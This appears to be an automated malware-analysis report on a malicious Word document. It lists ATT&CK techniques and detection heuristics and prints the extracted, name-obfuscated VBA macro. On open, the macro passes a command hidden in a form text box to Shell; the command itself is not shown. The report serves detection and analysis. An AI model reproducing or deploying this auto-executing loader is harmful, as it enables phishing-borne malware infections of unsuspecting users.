Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary code. This is further supported by the 'SC_STR_CMD' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The primary IOC is the VBA macro file itself, which contains the malicious logic.
Heuristics (9)

- ClamAV: Doc.Malware.Generic-6782702-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6782702-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `_ .Shell(oALJI, LvAUILAiisB), iHkRrQv) Set zUchnWRMDzuRujJPwVETjZnz = fCDzrtlLiLtXMiQ`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() ZifucmS`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8626 bytes |

SHA-256: 3dbfdb64e298b3e84380fb49d26fbf49725581d562f7d89e1c02743846b9f020

Detection (for the extracted macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 232 of 276 identifiers look randomly generated (e.g. 'LTrkraKGLYPXuzSuMlMJSPdc'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script, reproduced as extracted; the `.Shell(...)` call is split across blank `_` line-continuation lines):
Attribute VB_Name = "hnzhWjZcdibvb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
ZifucmS
End Sub
Attribute VB_Name = "GzXjaIqrqfcWn"
Function ZifucmS()
On Error Resume Next
Set CNkmDESYvqlZoWncihEAuzD = GrrYTfFNjnUsSrVF
Select Case EAdrqoJtOaFfazEJZjLNtEQl
Case 156759412
ABuJqMwEqzZTPDiiFEAiGoQ = tLJsCAksTznHwEksjVIGk
QIfPwLlpmMkLQiC = 45492296
qNhzSPafBTHBkf = wmvBMnBYGdKbXnnG
Case 280778363
TStCGwsFjzrdnCjbMdj = CByte(uOpoaVHoDsNNQc)
NQwjwJGDDhdpIuwaK = ChrW(qiEcEbkrECqkdNLlSK)
zmqnLlHzfwtHSCqaz = Log(kLUvFEEMTDQiXclJ)
End Select
Set aHaVolkErPrSzczbWHShPQad = SCASMXYMVMVWuIaGFvZl
Select Case WwjYiBoEiJjzoWijlisTFdP
Case 185194396
bzrbJVBrmwDQuiV = InCoYFlsXUQhSosjHTGBw
YofFCafSrAWizqNnjVNz = 26634163
FUZzDUIbXUniOOJSDLMEcQ = jrCWUmlnzZijLjFW
Case 68739565
PdCuSbwdOSCmzMoJ = CByte(GAwopmjqFjiwmzpCuNnIpY)
XqXSlKZVuBqzVLVaqWD = ChrW(vTfcUMkEzBBAhZbw)
TujfKkzwwTqZnwllK = Log(DKvwYaVVszpRwkXIXbXi)
End Select
Set ifbJwlGuVvBOicCXEYCTDE = cNCVFsjRkQwaiTDl
Select Case ziTQrivoEUEMzMi
Case 165985188
wwvQABoiQwlCTEBntT = luliGjBYcEnDNBOUGp
zhimakKmkPDZDsNnZMSojzd = 84078745
duYBEkuzBUoGILtwuQI = fjKANpHoAJzDRNwqmkj
Case 206141901
bCYYhRBZsojUotu = CByte(XoPcFwrVkovOCKJkdPEhm)
fYGPIUQjdTCHOwRDDiK = ChrW(osWmWhiwqYpNwv)
qVqoXEALbMuvNTa = Log(aWinnCTsapRsEipL)
End Select
Set ujYYTWqHCAQsLjmwajhUPIq = iSBNantBEtWIdXXLjZdCSt
Select Case BiEzuLkdltipBUdh
Case 101335840
OnRKdSDMVkqfnWp = AiWpzpUPkOuhWrF
OvDFvqAluiqznGGMAwTuLZI = 166465422
CZPXWpifzQsSjJJikv = zVciIijaXLjonimtQ
Case 246868981
YsLUopNtRmKMairZ = CByte(avGppPHTScFnzPtwWWYnAnou)
PnNwFJvEoSVfYidEAVNIGT = ChrW(RPDHTmzmGLAacuVMSJ)
JzXRwoviASbmivQvjCBcS = Log(jOTYHBKiIuwWKatwFTYDwTf)
End Select
Set HvZswDQuZQrjLGHo = FKTsaJjnEkiVjuiCNzWUW
Select Case nwwjXukRJqGCIAkUjltEsSm
Case 166865944
WNdwGkTNKWXurmmDmbnOhl = SsTkbRCVJZsBjHTCFnpz
NaozHBFrzKJkkLFnAsvI = 10278459
VwkFwTYibrnzESik = QwiKOjQwvOPEutpczF
Case 276101072
BFmSQjRzkGmIPYfLX = CByte(GOTIAEJdhwwWFN)
VSKKLufSTMpbGpVOdFwwav = ChrW(FhJmBSwOBZTuGUBLJbwAvKc)
oLjVRIONZYFcBH = Log(zVwoCnuPubtnXivzuEHw)
End Select
Const LvAUILAiisB = 0
Set zKSmfOcGLfbzCtIqnXMiHdIP = JhYIBjOhYlRHGNlHdYUi
Select Case qWjhwEfkrUCCFWjD
Case 325639317
wNPiHrjjKbWiEolW = KraCciwhRPFBrEDfN
RuMPpwStDOMPOQjDVM = 148605403
ViTwqbdfSXSwqSU = GvCcjifiUCBoRnirJFA
Case 256145005
PZNUmajvOYvwHwaKuYm = CByte(kbnapNfobplRhAqWoHzIwnGd)
rJqIhOhNnqnlnfY = ChrW(sUYniOHFDVmbiAzVJUzDofta)
EtJCkAcYMGThqb = Log(CkELcFintSbThVHMaziZ)
End Select
Set MTDltwkEPjSJoPzNzlD = sMzVorjvFMzFAHhj
Select Case IzlXzsUPcCCCDu
Case 204367535
zhzViwBSowDjNIjhQLq = SnuUcGMoisBRUdCaiNTMz
iwpkBTVVmrDtIKmfs = 182570091
NnwzlPjGGzCsiozEwfsFs = JGKOaVrnCVrbkfmBDU
Case 116879616
PWkzZFJGpzAWruiq = CByte(XpOOSwhBCEURvbXnfDmVKp)
MkzCUUkqAwNjfDwwZC = ChrW(WAoptYdjMqrUchTCdVtMjSOU)
hurkjGNSMSUXvDirlX = Log(IclwMAVbjpREmTVMdlzjkiBP)
End Select
Set FJwvbTzWVJjDCiwvdkD = OEYZNqVpCwkhPv
Select Case HiNwuRljqBNXdUSvkMEJBlX
Case 229404180
wJUYZznGnpQPlJncUhXzT = UjAzUKmtVGiOwHQKQCZQpiB
wDRhjDAjQGolYZicUtUJ = 246920932
MfLKRUZDBqiUARtENR = vzqSflrXwwwJrub
Case 280116441
VVmfJNEwCEYNjPjCCqZWN = CByte(YZzcGFjqZZaHjribmklT)
hSJNjPHoECTXpwMhjGwS = ChrW(izmbjpYbEokuCrHn)
ZqZBVXGjtuSuFinBQ = Log(TWlAZjNANidmFF)
End Select
Set APQdmGrCWoSImjFtjJMSj = wzZkLlNHTGmUFZwWCrnG
Select Case EZiHhZkArrSBUSTDCvFpO
Case 137679033
VRafwJHUidvsYqdi = dHbPTTlGcSzwiRVj
NpGtnqkWoYYavNZQ = 300810631
HtwBwoYUqIYwMZJK = nXSpQrsfvMjhFafoFOqR
Case 78027906
SUSzczsLwRljmtbWqCDWDcs = CByte(lhtHHLTsRvFzXQOvmjNOvW)
mNiXnOpopcfOuElEnwsSqn = ChrW(wanHkTOirOuGuYoficGP)
rCUqBiaQDDzwikzAGF = Log(awnzAzqjzTOqjXIHYS)
End Select
oALJI = hnzhWjZcdibvb.TextBox1 + oNoLzILo + XWmpXDC + KzazoNNa + ZipWflk + DpfsIoqT + lDVwYYs + zzjhlL + iAHDmENR + ERIwuPs
Set ZMpavCwFzbLwnzTwvdj = QVzjuljZHPWsKbucHLSJVw
Select Case EHFiwbobwjAKDNJfJT
Case 148519610
jESoMErpjLWUUBuYpDlwToZJ = RrOwjJqwwlAoRWtk
slMfqCSkqGhYivfJiuNcqDBj = 144900882
QujYjrNUwoziaowNpC = aUpUfmbfHIojjJU
Case 250902814
ARZqKKzrMAUYjdNzXvB = CByte(ZElFLGMHEQUGCYMYcSQ)
pdTlHGbiakIOTLww = ChrW(UiEwrmvjNWIQpWFfrlwk)
zFihjTIGmraPrH = Log(LLzqYFtkTNlOCicaCMfXZZ)
End Select
Set lPzmwAlTFNzPNjCRNKzldChk = haPlNaGIFUIMia
Select Case aRJYzXKFcAsbPB
Case 145641136
iNmPZVhrnqHHLuFjjtKMt = ndWUnlVwrGjmazr
dFjSkGPCtiuJsVrJ = 270719507
ZItFivVpzBYZTGrXPFc = XjNUbErLGVPZzAZiRYW
Case 264765063
vHOiUOoSUFljOCtvZddEKidl = CByte(bTjIFriodbYwpHqCtmPdtiwf)
sutjmNicfsuHJOOCslaVwj = ChrW(nBQwNIFtUBUNwpEqOu)
KOvvjYBaBzYKqJYFiW = Log(QUazaFpBSNnvLaaYI)
End Select
Set RbNwZosVPmBdUqujHNSI = tiEaONLraiYojwawnq
Select Case XtMCsZSjJuHzjmIYwJWKbjdp
Case 26338836
pktTkUWVkbjcMAwhCzT = sCbYdpRjVqPXwPkhmpJna
BjrTzVNtifVSjnJV = 275213884
CqAuMIiwQPvNnjKiBujKsvS = LjCfjzYQzOkkKGUjpAF
Case 330253977
QrpHAlOpfCGXYicFzPTriNZv = CByte(YvawVrqUcvrMXfLJbUL)
MlXrdqklGUDSthcqnsKL = ChrW(DwnksbkHhDtNROnXj)
fGENIrZTqDVWiJANJ = Log(jHlOAiYRJEcTpSEafELpnv)
End Select
Set wsiwMimZqhwPNlllMVk = zsZSDjtOmGMoLimzrmlR
Select Case tvVwcOZqwhUMKaESPs
Case 207562806
XmkUHEjwmtajTFGwETbRT = qYsbBDhjctGjzGLBrX
aEDHktFUHOwRNRAwLcfC = 208117274
GQjdnFzlCcDmtTnRH = vjaRjcsOzKzYLVzJzmaHG
Case 339103066
VMTNaYhJuVzHwqpkEl = CByte(GpmiQimjVBqAbwPEEMP)
qSAFDONDSIBWWisij = ChrW(DiooLIDVVKhlkYpTiooja)
UjQMzTitDkVWIk = Log(BGsBisDWjYchCzEqCHAJ)
End Select
Set lEXLrzHbkhqlCwCNKHRlXjdt = wEkkwjUAaXOzkzvLiQ
Select Case dDGIEvpttIaBbdousWqoA
Case 141322866
baoNZIVZtSvPSpwjoGnbs = VmWwEDonchISfi
iQkYihjjNVFwqChMu = 297796595
EBrdDSlFqNHAKNPGqCC = TmGIazGwluUNZDdP
Case 284999962
hGzbsSGVuiavrKrjISuiCD = CByte(nTvstaGkAPCVwMrt)
CFEXXqDKWpvLUIkduJIzaM = ChrW(owZjoouXRYHjwznPdshXlKY)
GSsCCiwNpLQYzJOWbSim = Log(coiGtiFspIdZtaWw)
End Select
Set LTrkraKGLYPXuzSuMlMJSPdc = hjuHQfUZipMtJEtswOwtlQS
Select Case kobDwiwpPsJrPwutvwQH
Case 39894504
CjTRVBjiGRQQWc = QaztWiRvBdwTDz
zLXjlukhIuJjlsbwbSpiYQ = 95763781
WklRnXhdkTRFtnqJfsrwN = jCaiWBNSOjwoMAJSulNfvRbW
Case 33113987
cjwjZQVZEirIAjPRFhIEap = CByte(NwGkhCPbEZiZhT)
KjSnwablkhPdMtNAOmflh = ChrW(fnWoGniSHizWXcmmsZ)
MVDRYDiqZTmBiArAiRITnC = Log(ahfpVkOctFzVzbVzl)
End Select
Set AvNqiOSjtLFSBlwAjWnmi = vJcTJXXpPPwSTGaEcPA
Select Case UkTZWcudvWbMBZA
Case 26007817
PFvLDvqVjSpabtXl = HKqDwjcuutnjQtGWrMK
wQpcDmKEDUcDabR = 277639962
KSYSRJCClTYjDkhN = iqUNAKWYqZQkJobQIjtl
Case 253529522
GmaRSlUzkvquwbVAJICu = CByte(jlSciwTvDnctAjinjrk)
qpVuOsAuIXljsC = ChrW(BHonoBEjHNAwrnNaQR)
kuPYOmvYnjCsBzMjfuDvCmJ = Log(jOvJHuwURARcmjaB)
End Select
zIjrcHw = Array(NQEqji, frKRMkoXm, tzuSPHb, Interaction _
_
_
_
_
_
_
_
.Shell(oALJI, LvAUILAiisB), iHkRrQv)
Set zUchnWRMDzuRujJPwVETjZnz = fCDzrtlLiLtXMiQ
Select Case RHKWJiQljUNbXP
Case 172951747
dZIUOMMFIFPYQrjmoRPS = dwwmSPWfJnPkMunawnEv
NDSsUrkanGAIEAb = 78603416
wwpZzRAnDzwMsdKXXPudu = YmFVhOcIuMOOqHFfNmREQuoO
Case 308983579
qkjkjinzYDUdkmKvDkwi = CByte(CRrCIMpjiwqbFYrbKfjarj)
LkBftVrDPQpoTp = ChrW(XWzTuFdCfOTTsFSDvSPjS)
jwLnubKPjYmcHKc = Log(pzihWRaBwwzNtVEIPRp)
End Select
End Function